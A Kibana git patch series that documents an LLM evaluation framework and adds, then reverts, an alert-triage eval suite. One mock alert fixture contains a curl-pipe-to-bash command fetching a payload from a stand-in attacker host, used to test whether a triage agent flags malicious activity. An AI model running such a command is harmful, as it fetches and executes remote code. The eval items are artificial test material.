From cafe95399e473dc1e143cd430d3afe4c55717a9c Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Tue, 17 Mar 2026 20:42:10 +0100
Subject: [PATCH 01/15] docs(evals): add vision alignment guidance and JSDoc
 for public API

- Add "Vision Alignment" section to README with strategic principles
  (trace-first, Elastic-native, shared layer boundaries, ownership)
- Add module-level JSDoc to index.ts explaining architecture boundaries
- Document trace-first evaluator contract in Evaluator and EvaluationResult types
- Export createTraceBasedEvaluator and TraceBasedEvaluatorConfig from barrel
  to promote trace-first pattern as the primary building block
- Add JSDoc to all new evaluator factories (security, trajectory, similarity,
  multi-judge, conversation-coherence) explaining purpose and parameters
- Add trace-first migration path annotation to security evaluators module

Addresses vision alignment concerns:
- Section 5.2.1 (trace-first evaluator contract)
- Section 5.2.3 (shared evaluation layer boundaries)
- Section 4.5 (ownership model)
- CI metrics: reduces public API documentation gap
---
 .../packages/shared/kbn-evals/README.md       | 10 ++++++
 .../packages/shared/kbn-evals/index.ts        | 29 +++++++++++++++++
 .../conversation_coherence/index.ts           | 11 +++++++
 .../src/evaluators/multi_judge/index.ts       | 12 +++++++
 .../src/evaluators/security/index.ts          | 31 +++++++++++++++++++
 .../src/evaluators/similarity/index.ts        |  9 ++++++
 .../src/evaluators/trajectory/index.ts        | 12 +++++++
 .../packages/shared/kbn-evals/src/types.ts    | 15 +++++++++
 8 files changed, 129 insertions(+)

diff --git a/x-pack/platform/packages/shared/kbn-evals/README.md b/x-pack/platform/packages/shared/kbn-evals/README.md
index 4043efd263116..c31fee6b16853 100644
--- a/x-pack/platform/packages/shared/kbn-evals/README.md
+++ b/x-pack/platform/packages/shared/kbn-evals/README.md
@@ -2,6 +2,16 @@
 
 `@kbn/evals` contains utilities for writing offline evaluation suites against LLM-based workflows in Kibana.
 
+## Vision Alignment
+
+This package follows the strategic direction outlined in the "Future of @kbn/evals" vision document. Contributors should be aware of these principles:
+
+- **Trace-first evaluators**: New evaluators should derive signals from OTel traces stored in Elasticsearch when possible. Use `createTraceBasedEvaluator` for non-functional metrics. For evaluators that currently operate on in-memory output, design interfaces that also accept `traceId` references for future API-based evaluation.
+- **Elastic-native path**: Build on ES/Kibana/OTel capabilities rather than introducing new external dependencies. Phoenix usage should remain behind `KBN_EVALS_EXECUTOR=phoenix` and not expand.
+- **Shared evaluation layer**: This package provides primitives (evaluator factories, data model, persistence, reporting). Solution-specific evaluators, datasets, and reporting belong in solution-owned evaluation suites, not here.
+- **Code-defined datasets**: Evaluation datasets should be defined in code, versioned, and reviewed alongside suites. Ad-hoc datasets must be explicitly decoupled from CI-contributing datasets.
+- **Ownership**: Framework is owned by the Observability AI team. General-purpose evaluators discovered in solution suites should be contributed upstream.
+
 This package is built on top of `@kbn/scout` and the `@kbn/inference-*` packages. It bundles three main entry-points:
 
 1. `createPlaywrightEvalsConfig` – helper that returns a ready-made Playwright config for evaluation suites. It automatically:
diff --git a/x-pack/platform/packages/shared/kbn-evals/index.ts b/x-pack/platform/packages/shared/kbn-evals/index.ts
index b1ccf15f1a958..40e2ed178e34e 100644
--- a/x-pack/platform/packages/shared/kbn-evals/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/index.ts
@@ -4,6 +4,23 @@
  * 2.0; you may not use this file except in compliance with the Elastic License
  * 2.0.
  */
+
+/**
+ * @kbn/evals — Evaluation framework for LLM-based workflows in Kibana.
+ *
+ * This package provides the shared evaluation layer (vision Section 5.2.3): evaluator
+ * factories, data model types, persistence utilities, and reporting primitives. It is
+ * designed to be independent of how evaluations are triggered (CI/offline vs in-tool).
+ *
+ * ## Architecture boundaries
+ * - **Framework primitives** (this package): evaluator contracts, trace-based evaluators,
+ *   data model, persistence, reporting, CLI tooling
+ * - **Solution suites** (separate packages): datasets, tasks, solution-specific evaluators,
+ *   solution-specific reporting
+ *
+ * @module @kbn/evals
+ */
+
 // CLI tools
 export * as cli from './src/cli';
 
@@ -55,7 +72,19 @@ export {
 export { mapToEvaluationScoreDocuments, exportEvaluations } from './src/utils/report_model_score';
 
 export { parseSelectedEvaluators, selectEvaluators } from './src/evaluators/filter';
+/**
+ * Trace-based evaluators — the preferred pattern for non-functional metrics.
+ *
+ * These evaluators query OTel traces in Elasticsearch via ES|QL, extracting latency,
+ * token usage, tool calls, and skill invocations directly from production-grade traces.
+ * This is the trace-first evaluator pattern described in vision Section 5.2.1.
+ *
+ * New evaluators that measure non-functional signals should use `createTraceBasedEvaluator`
+ * rather than implementing custom ES queries.
+ */
 export {
+  createTraceBasedEvaluator,
+  type TraceBasedEvaluatorConfig,
   createSpanLatencyEvaluator,
   createSkillInvocationEvaluator,
 } from './src/evaluators/trace_based';
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/conversation_coherence/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/conversation_coherence/index.ts
index 0ce749750d618..3b853a90e400b 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/conversation_coherence/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/conversation_coherence/index.ts
@@ -11,6 +11,17 @@ import pRetry from 'p-retry';
 import type { Evaluator } from '../../types';
 import { LlmCoherenceEvaluationPrompt } from './prompt';
 
+/**
+ * LLM-as-a-judge evaluator that scores multi-turn conversation quality across four
+ * dimensions: topic consistency, context retention, contradiction detection, and
+ * resolution quality. Each dimension is scored 0–1 by the LLM, then averaged.
+ *
+ * Uses retry logic for resilience against transient LLM failures. Validates that
+ * all returned scores are finite numbers in the [0, 1] range.
+ *
+ * @param config.inferenceClient - Bound inference client for LLM calls
+ * @param config.log - Logger for retry warnings and error reporting
+ */
 export function createConversationCoherenceEvaluator(config: {
   inferenceClient: BoundInferenceClient;
   log: ToolingLog;
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
index 21ffd36ddd634..bc96346e1b7be 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
@@ -25,6 +25,18 @@ function computeMajority(scores: number[]): number {
   return ones > rounded.length / 2 ? 1 : 0;
 }
 
+/**
+ * Meta-evaluator that aggregates scores from multiple judge evaluators using a
+ * configurable strategy (mean, median, or majority vote).
+ *
+ * Individual judge failures are handled gracefully — failed judges are logged via
+ * the optional logger and excluded from aggregation. The evaluator's `kind` is
+ * derived from the judges: 'LLM' if any judge is LLM-based, 'CODE' otherwise.
+ *
+ * @param config.judges - Array of evaluators to aggregate
+ * @param config.strategy - Aggregation method: 'mean' | 'median' | 'majority' (default: 'mean')
+ * @param config.logger - Optional logger for warning on judge failures
+ */
 export function createMultiJudgeEvaluator(config: {
   judges: Evaluator[];
   strategy?: AggregationStrategy;
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
index a9eb3681d972f..cd2e744ded102 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
@@ -5,6 +5,17 @@
  * 2.0.
  */
 
+/**
+ * Security evaluators for adversarial testing and guardrail validation.
+ *
+ * These evaluators currently operate on in-memory task output. Per the @kbn/evals
+ * vision (Section 5.2.1 — Trace-first evaluators), they should migrate to derive
+ * signals from OTel trace spans stored in Elasticsearch. When a `traceId` is
+ * available in the task output, evaluators propagate it in result metadata to
+ * support trace linkage (Section 5.2.2).
+ *
+ * @see {@link createTraceBasedEvaluator} for the trace-first evaluator factory
+ */
 import type { Evaluator } from '../../types';
 
 const DEFAULT_PROMPT_LEAK_PATTERNS = [
@@ -16,6 +27,12 @@ const DEFAULT_PROMPT_LEAK_PATTERNS = [
   /<<SYS>>/i,
 ];
 
+/**
+ * Detects unauthorized tool invocations by comparing actual tool calls against an allowlist.
+ *
+ * Returns score 1.0 when all tool calls are authorized, 0.0 when unauthorized tools are detected.
+ * Unauthorized tool names are included in the result metadata for investigation.
+ */
 export function createToolPoisoningEvaluator(config: {
   allowedTools: string[];
   extractToolCalls: (output: unknown) => string[];
@@ -57,6 +74,13 @@ export function createToolPoisoningEvaluator(config: {
   };
 }
 
+/**
+ * Detects potential system prompt leakage in model output using configurable regex patterns.
+ *
+ * Scans both plain text and code blocks separately. Excluded patterns are stripped before
+ * scanning to allow known-safe content. Returns score 1.0 when no leak indicators found,
+ * 0.0 with detected pattern details when leaks are identified.
+ */
 export function createPromptLeakDetectionEvaluator(config?: {
   patterns?: RegExp[];
   excludePatterns?: RegExp[];
@@ -123,6 +147,13 @@ export function createPromptLeakDetectionEvaluator(config?: {
   };
 }
 
+/**
+ * Validates that model output stays within defined scope boundaries using regex patterns.
+ *
+ * Returns score 1.0 when output matches at least one allowed pattern, 0.0 when output
+ * falls outside all allowed patterns. Useful for ensuring agents don't drift into
+ * unauthorized domains.
+ */
 export function createScopeViolationEvaluator(config: { allowedPatterns: RegExp[] }): Evaluator {
   const { allowedPatterns } = config;
 
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/similarity/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/similarity/index.ts
index d42b6744f8e8d..68a39d27ee78e 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/similarity/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/similarity/index.ts
@@ -65,6 +65,15 @@ function sortKeys(value: unknown): unknown {
     }, {});
 }
 
+/**
+ * Computes term-frequency cosine similarity between expected and actual outputs.
+ *
+ * Both inputs are normalized to lowercase tokens. Objects are sorted by keys and
+ * serialized to JSON for consistent comparison. Returns a score between 0 and 1,
+ * with a configurable threshold for the similar/dissimilar label.
+ *
+ * @param config.threshold - Minimum cosine similarity to be labeled 'similar' (default: 0.7)
+ */
 export function createSimilarityEvaluator(config?: { threshold?: number }): Evaluator {
   const threshold = config?.threshold ?? 0.7;
 
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/trajectory/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/trajectory/index.ts
index 5c460e2e3ab2c..e5011c6eb9ab1 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/trajectory/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/trajectory/index.ts
@@ -40,6 +40,18 @@ function computeLCS(a: string[], b: string[]): string[] {
   return lcs;
 }
 
+/**
+ * Evaluates tool-call sequence alignment against a golden path using Longest Common
+ * Subsequence (LCS) for order scoring and set intersection for coverage scoring.
+ *
+ * The final score is a weighted combination of order and coverage scores.
+ * Both weights must sum to 1.
+ *
+ * @param config.extractToolCalls - Extracts actual tool call names from task output
+ * @param config.goldenPathExtractor - Extracts expected tool sequence from ground truth
+ * @param config.orderWeight - Weight for LCS-based order score (default: 0.5)
+ * @param config.coverageWeight - Weight for set-based coverage score (default: 0.5)
+ */
 export function createTrajectoryEvaluator(config: {
   extractToolCalls: (output: unknown) => string[];
   goldenPathExtractor: (expected: unknown) => string[];
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/types.ts b/x-pack/platform/packages/shared/kbn-evals/src/types.ts
index 9ef5be0233633..35e7646bb4f16 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/types.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/types.ts
@@ -65,6 +65,10 @@ export interface EvaluatorParams<TExample extends Example, TTaskOutput extends T
 /**
  * Evaluation output returned by evaluators.
  *
+ * Follows the trace-first evaluator contract (vision Section 5.2.1): evaluators produce
+ * standardized score/label/explanation outputs. The `metadata` field can carry trace
+ * references and evaluator-specific details for explainability.
+ *
  * This shape is intentionally compatible with the existing evaluator implementations and
  * the Phoenix client types:
  * - `score` may be omitted or `null` for "unavailable"/"error" cases
@@ -83,6 +87,17 @@ type EvaluatorCallback<TExample extends Example, TTaskOutput extends TaskOutput>
   params: EvaluatorParams<TExample, TTaskOutput>
 ) => Promise<EvaluationResult>;
 
+/**
+ * Core evaluator interface.
+ *
+ * All evaluators — whether CODE-kind (deterministic) or LLM-kind (model-scored) — implement
+ * this interface. Per the @kbn/evals vision (Section 5.2.1), evaluators should progressively
+ * migrate to deriving signals from OTel traces stored in Elasticsearch rather than only
+ * operating on in-memory task output. Use {@link createTraceBasedEvaluator} for trace-native
+ * evaluators.
+ *
+ * @see TraceBasedEvaluatorConfig for the trace-first evaluator factory configuration
+ */
 export interface Evaluator<
   TExample extends Example = Example,
   TTaskOutput extends TaskOutput = TaskOutput

From 5add16ca5fb8689d08178ea349c60029e06bcd1c Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Wed, 18 Mar 2026 16:53:48 +0100
Subject: [PATCH 02/15] fix(evals): resolve Playwright worker crashes blocking
 @kbn/evals execution
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Two framework bugs prevented Playwright workers from executing @kbn/evals
test suites:

1. `.text` file imports crash workers — packages like @kbn/evals import
   `.text` files (LLM prompt templates) that need a require hook to
   convert them to CommonJS modules. The hook was registered in the main
   process via @kbn/babel-register but Playwright workers use their own
   module resolution. Added a `dot_text_setup.ts` require hook in
   @kbn/scout (mirroring the existing peggy_setup pattern).

2. `NO_COLOR` env warning kills workers — Playwright sets `FORCE_COLOR`
   while `NO_COLOR` may also be in the environment. Node emits a warning
   for this conflict, and `exit_on_warning.js` terminates the process on
   any unrecognized warning. Added this specific warning to the ignore
   list.

Also adds an initial agentic alert triage eval suite with 5 test cases
for the skill migration validation.
---
 .../src/playwright/dot_text_setup.ts          |  36 ++
 .../shared/kbn-scout/src/playwright/index.ts  |   2 +
 src/setup_node_env/exit_on_warning.js         |   5 +
 .../evals/triage/triage.spec.ts               | 315 ++++++++++++++++++
 4 files changed, 358 insertions(+)
 create mode 100644 src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
 create mode 100644 x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts

diff --git a/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts b/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
new file mode 100644
index 0000000000000..202bf2dd31155
--- /dev/null
+++ b/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
@@ -0,0 +1,36 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the "Elastic License
+ * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
+ * Public License v 1"; you may not use this file except in compliance with, at
+ * your election, the "Elastic License 2.0", the "GNU Affero General Public
+ * License v3.0 only", or the "Server Side Public License, v 1".
+ */
+
+/**
+ * Initialize require hook for .text files.
+ * This is required for packages like @kbn/evals that import .text files
+ * (e.g. LLM prompt templates) via `import text from './file.text'`.
+ *
+ * Without this, Playwright worker processes crash with:
+ *   SyntaxError: Unexpected identifier 'are'
+ * because Node tries to parse the raw text content as JavaScript.
+ *
+ * The hook converts .text file contents into `module.exports = "<escaped content>"`.
+ */
+import Fs from 'fs';
+
+if (!require.extensions['.text']) {
+  const cache = new Map<string, string>();
+
+  require.extensions['.text'] = function (module: NodeModule, filename: string) {
+    let compiled = cache.get(filename);
+    if (!compiled) {
+      const content = Fs.readFileSync(filename, 'utf8');
+      compiled = `module.exports = ${JSON.stringify(content)};\n`;
+      cache.set(filename, compiled);
+    }
+    // @ts-expect-error _compile is an internal Node.js API
+    module._compile(compiled, filename);
+  };
+}
diff --git a/src/platform/packages/shared/kbn-scout/src/playwright/index.ts b/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
index 897afa6ab6635..8e76d55b61ffc 100644
--- a/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
+++ b/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
@@ -9,6 +9,8 @@
 
 // Needed for Scout tests dependent on .peggy grammar files (`@kbn/tinymath`)
 import './peggy_setup';
+// Needed for packages that import .text files (e.g. @kbn/evals LLM prompt templates)
+import './dot_text_setup';
 
 // Config and utilities
 export { createPlaywrightConfig } from './config';
diff --git a/src/setup_node_env/exit_on_warning.js b/src/setup_node_env/exit_on_warning.js
index 40d78071f9a4a..379155f07ce6f 100644
--- a/src/setup_node_env/exit_on_warning.js
+++ b/src/setup_node_env/exit_on_warning.js
@@ -107,6 +107,11 @@ var IGNORE_WARNINGS = [
     messageContains:
       'Keys with collection values will be stringified due to JS Object restrictions',
   },
+  // Playwright workers set FORCE_COLOR while NO_COLOR may also be set
+  {
+    name: 'Warning',
+    messageContains: "'NO_COLOR' env is ignored due to the 'FORCE_COLOR' env being set",
+  },
 ];
 
 if (process.noProcessWarnings !== true) {
diff --git a/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts b/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts
new file mode 100644
index 0000000000000..0c7427cf52d58
--- /dev/null
+++ b/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts
@@ -0,0 +1,315 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+import { tags } from '@kbn/scout';
+import { createHash } from 'crypto';
+import { evaluate as base } from '../../src/evaluate';
+import type { EvaluateDataset } from '../../src/evaluate_dataset';
+import { createEvaluateDataset } from '../../src/evaluate_dataset';
+
+const AGENTS_API_BASE_PATH = '/api/agent_builder/agents';
+const SKILLS_API_BASE_PATH = '/api/agent_builder/skills';
+
+const TRIAGE_SKILL_IDS = [
+  'agentic-alert-triage-l1-investigation',
+  'agentic-alert-triage-l1-triage',
+  'agentic-alert-triage-orchestrator',
+  'agentic-alert-triage-threshold-context',
+  'agentic-alert-triage-l3-review',
+];
+
+const MOCK_ALERT_CONTEXT = [
+  'Alert ID: abc-123-def',
+  'Rule: Suspicious Process Execution via macOS Script',
+  'Severity: high',
+  'Time: 2026-03-18T10:00:00Z',
+  'Agent type: endpoint',
+  'Host: mbp-user1 (host-id-001)',
+  'OS: macos',
+  'User: user1@example.com (user1)',
+  'Source IP: 10.0.0.42',
+  'Process: osascript',
+  'SHA256: a1b2c3d4e5f6...',
+  '',
+  'Rule Description: Detects execution of osascript with suspicious arguments that may indicate social engineering.',
+  'Alert reason: osascript was executed with arguments matching known social engineering patterns on mbp-user1.',
+  'Known false positives: ["IT automation scripts using osascript for legitimate purposes"]',
+].join('\n');
+
+const MOCK_BENIGN_INVESTIGATION = [
+  'Verdict: False Positive',
+  'Assessment: benign',
+  'Summary: The osascript execution was triggered by an IT automation script (Jamf policy) deploying a standard configuration profile.',
+  '',
+  '## Evidence',
+  '- Process command line: osascript -e \'tell application "System Events" to display dialog "Install update?"\'',
+  '- Parent process: jamf (PID 1234), signed by Jamf',
+  '- The Jamf agent on this host has a policy that uses osascript for user-facing dialogs during patch deployment',
+  '- No network connections from the osascript process',
+  '- Host alerts 24h: 0 other alerts on this host',
+  '- Okta: normal login patterns for user1@example.com (1 login, 1 IP, US only)',
+  '',
+  '## Timeline',
+  '- 09:55 — Jamf policy "Q1 Patch Deploy" started on mbp-user1',
+  '- 10:00 — osascript executed by jamf to display update dialog',
+  '- 10:01 — User clicked OK, dialog dismissed',
+].join('\n');
+
+const MOCK_SUSPICIOUS_INVESTIGATION = [
+  'Verdict: True Positive',
+  'Assessment: suspicious',
+  'Summary: The osascript execution does not match any known Jamf or IT automation pattern and includes obfuscated arguments.',
+  '',
+  '## Evidence',
+  '- Process command line: osascript -e \'do shell script "curl http://evil.example.com/payload | bash"\'',
+  '- Parent process: Terminal.app (PID 5678), user-initiated',
+  '- No matching Jamf policies on this host',
+  '- The curl target (evil.example.com) resolves to an IP associated with known C2 infrastructure',
+  '- Host alerts 24h: 3 other alerts — "Suspicious Network Connection", "Unsigned Binary Execution"',
+  '- Okta: user1@example.com logged in from 2 distinct IPs in 2 countries (US, RU) in the last 24h',
+  '',
+  '## Timeline',
+  '- 09:30 — User logged in from unusual IP (RU)',
+  '- 09:45 — Terminal.app opened',
+  '- 10:00 — osascript executed with curl | bash payload',
+  '- 10:02 — Outbound connection to evil.example.com detected',
+].join('\n');
+
+const evaluate = base.extend<{ evaluateDataset: EvaluateDataset }, {}>({
+  evaluateDataset: [
+    ({ chatClient, evaluators, executorClient, traceEsClient, log }, use) => {
+      use(
+        createEvaluateDataset({
+          chatClient,
+          evaluators,
+          executorClient,
+          traceEsClient,
+          log,
+        })
+      );
+    },
+    { scope: 'test' },
+  ],
+});
+
+evaluate.describe(
+  'Agentic Alert Triage - Skill Migration Evals',
+  { tag: tags.stateful.classic },
+  () => {
+    let triageAgentId: string | undefined;
+
+    evaluate.beforeAll(async ({ fetch, log, connector }) => {
+      // Verify that the triage skills exist (they should be pre-imported)
+      for (const skillId of TRIAGE_SKILL_IDS) {
+        try {
+          await fetch(`${SKILLS_API_BASE_PATH}/${encodeURIComponent(skillId)}`, {
+            version: '2023-10-31',
+          });
+          log.debug(`Skill verified: ${skillId}`);
+        } catch {
+          log.warning(`Skill ${skillId} not found — import it before running this suite`);
+        }
+      }
+
+      // Create a dedicated eval agent with the triage skills attached
+      const connectorHash = createHash('sha256').update(connector.id).digest('hex').slice(0, 8);
+      const ts = Date.now().toString(36);
+      const agentId = `eval_triage_${connectorHash}_${ts}`;
+
+      await fetch(AGENTS_API_BASE_PATH, {
+        method: 'POST',
+        version: '2023-10-31',
+        body: JSON.stringify({
+          id: agentId,
+          name: 'Eval: Agentic Alert Triage',
+          description: 'Evaluation agent for triage skill migration testing.',
+          configuration: {
+            enable_elastic_capabilities: true,
+            skill_ids: TRIAGE_SKILL_IDS,
+            tools: [],
+          },
+        }),
+      });
+
+      triageAgentId = agentId;
+      log.info(`Created eval agent: ${agentId}`);
+    });
+
+    evaluate.afterAll(async ({ fetch, log }) => {
+      if (triageAgentId) {
+        try {
+          await fetch(`${AGENTS_API_BASE_PATH}/${encodeURIComponent(triageAgentId)}`, {
+            method: 'DELETE',
+            version: '2023-10-31',
+          });
+          log.debug(`Deleted eval agent: ${triageAgentId}`);
+        } catch (e) {
+          log.warning(
+            `Failed to delete eval agent "${triageAgentId}": ${
+              e instanceof Error ? e.message : String(e)
+            }`
+          );
+        }
+      }
+    });
+
+    evaluate(
+      'L1 investigation produces structured Markdown with verdict',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: l1-investigation',
+            description:
+              'Validates that the L1 investigation skill produces a Markdown report with Verdict, Assessment, and Summary.',
+            examples: [
+              {
+                input: {
+                  question: `Investigate this security alert and return your findings in Markdown.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
+                },
+                output: {
+                  expected:
+                    'A Markdown investigation report containing Verdict, Assessment, and Summary fields, followed by evidence and timeline sections.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+
+    evaluate(
+      'L1 triage classifies benign alert correctly',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: l1-triage-benign',
+            description:
+              'Validates that the agent classifies a clearly benign alert as benign with high confidence.',
+            examples: [
+              {
+                input: {
+                  question: `Classify this alert based on the L1 investigation findings.\n\n=== L1 INVESTIGATION FINDINGS ===\n${MOCK_BENIGN_INVESTIGATION}\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
+                },
+                output: {
+                  expected:
+                    'JSON output with assessment "benign" and confidence "high", since the investigation clearly concludes this is a false positive from IT automation.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+
+    evaluate(
+      'L1 triage classifies suspicious alert correctly',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: l1-triage-suspicious',
+            description:
+              'Validates that the agent classifies a suspicious alert as suspicious or malicious.',
+            examples: [
+              {
+                input: {
+                  question: `Classify this alert based on the L1 investigation findings.\n\n=== L1 INVESTIGATION FINDINGS ===\n${MOCK_SUSPICIOUS_INVESTIGATION}\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
+                },
+                output: {
+                  expected:
+                    'JSON output with assessment "suspicious" or "malicious" since the investigation shows obfuscated osascript with curl to known C2, multi-country logins, and correlated alerts.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+
+    evaluate(
+      'Orchestrator produces full triage report with all sections',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: orchestrator-full-flow',
+            description:
+              'Validates the orchestrator skill produces a comprehensive report with L1, L2, and L3 sections.',
+            examples: [
+              {
+                input: {
+                  question: `Orchestrate the full triage in one run for this alert.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}\n\nSignals index: .siem-signals-infosec-detections`,
+                },
+                output: {
+                  expected:
+                    'A structured Markdown report containing L1 Investigation with Verdict/Assessment/Summary, L1 Triage JSON with assessment/confidence/reasoning, L2 Findings with domain-specific analysis, and L3 Review with final assessment.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+
+    evaluate(
+      'Orchestrator handles benign alert with appropriate assessment',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: orchestrator-benign',
+            description:
+              'Validates the orchestrator correctly identifies a benign alert given clear false-positive context.',
+            examples: [
+              {
+                input: {
+                  question: `Orchestrate the full triage for this alert. The workstation lookup shows it is owned by IT admin and the process is part of standard Jamf deployment.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}\n\n=== WORKSTATION OWNER ===\nuser1@example.com, IT Admin, managed by Jamf\n\n=== ENRICHMENT ===\nHost alerts 24h: 0 other alerts\nOkta: 1 login from expected office IP\nCorrelated alerts 72h: none`,
+                },
+                output: {
+                  expected:
+                    'Report concludes benign/false positive with high confidence. The triage JSON should show assessment "benign". The review should recommend closing the alert.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+  }
+);

From 9abcea53bd7fd0b408fc608b1a0761ac52d17eb7 Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Wed, 18 Mar 2026 16:55:22 +0100
Subject: [PATCH 03/15] Revert "fix(evals): resolve Playwright worker crashes
 blocking @kbn/evals execution"

This reverts commit 5add16ca5fb8689d08178ea349c60029e06bcd1c.
---
 .../src/playwright/dot_text_setup.ts          |  36 --
 .../shared/kbn-scout/src/playwright/index.ts  |   2 -
 src/setup_node_env/exit_on_warning.js         |   5 -
 .../evals/triage/triage.spec.ts               | 315 ------------------
 4 files changed, 358 deletions(-)
 delete mode 100644 src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
 delete mode 100644 x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts

diff --git a/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts b/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
deleted file mode 100644
index 202bf2dd31155..0000000000000
--- a/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
+++ /dev/null
@@ -1,36 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the "Elastic License
- * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
- * Public License v 1"; you may not use this file except in compliance with, at
- * your election, the "Elastic License 2.0", the "GNU Affero General Public
- * License v3.0 only", or the "Server Side Public License, v 1".
- */
-
-/**
- * Initialize require hook for .text files.
- * This is required for packages like @kbn/evals that import .text files
- * (e.g. LLM prompt templates) via `import text from './file.text'`.
- *
- * Without this, Playwright worker processes crash with:
- *   SyntaxError: Unexpected identifier 'are'
- * because Node tries to parse the raw text content as JavaScript.
- *
- * The hook converts .text file contents into `module.exports = "<escaped content>"`.
- */
-import Fs from 'fs';
-
-if (!require.extensions['.text']) {
-  const cache = new Map<string, string>();
-
-  require.extensions['.text'] = function (module: NodeModule, filename: string) {
-    let compiled = cache.get(filename);
-    if (!compiled) {
-      const content = Fs.readFileSync(filename, 'utf8');
-      compiled = `module.exports = ${JSON.stringify(content)};\n`;
-      cache.set(filename, compiled);
-    }
-    // @ts-expect-error _compile is an internal Node.js API
-    module._compile(compiled, filename);
-  };
-}
diff --git a/src/platform/packages/shared/kbn-scout/src/playwright/index.ts b/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
index 8e76d55b61ffc..897afa6ab6635 100644
--- a/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
